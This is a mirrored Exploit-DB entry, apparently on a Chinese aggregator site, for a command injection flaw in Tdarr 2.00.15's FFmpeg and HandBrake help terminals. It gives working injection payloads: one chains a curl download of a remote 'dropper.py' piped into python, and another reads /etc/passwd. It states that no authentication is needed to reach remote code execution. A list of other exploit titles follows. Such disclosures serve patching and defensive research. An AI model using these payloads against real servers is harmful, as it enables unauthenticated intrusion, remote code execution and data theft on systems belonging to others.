Tdarr 2.00.15 – Command Injection

Exploit Database
135 阅读

作者： Sam Smith

日期： 2022-03-11
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/50822/

# Exploit Title: Tdarr 2.00.15 - Command Injection

# Date: 10/03/2022

# Exploit Author: Sam Smith

# Vendor Homepage: https://tdarr.io

# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip

# Version: 2.00.15 (likely also older versions)

# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. <code>--help; curl http://192.168.0.2/dropper.py | python</code> or <code>--help;whoami;cat /etc/passwd</code>.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE

last Exploits
Tdarr 2.00.15 – Command Injection的更多信息

VMware 2 Web Server – Directory Traversal：
Apple Safari Webkit – libxslt Arbitrary File Creation (Metasploit)：
Cypress Solutions CTM-200 2.7.1 – Root Remote OS Command Injection：
Apple iTunes 8.1.1 (Mac OSX) – ITms Overflow (Metasploit)：
eMerge E3 Access Controller 4.6.07 – Remote Code Execution：
D-Link DIR-825 (vC) – Multiple Vulnerabilities：
ProFTPd 1.3.3c – Compromised Source Backdoor Remote Code Execution：
TCPDF 4.5.036/4.9.5 – ‘params’ Attribute Remote Code Execution：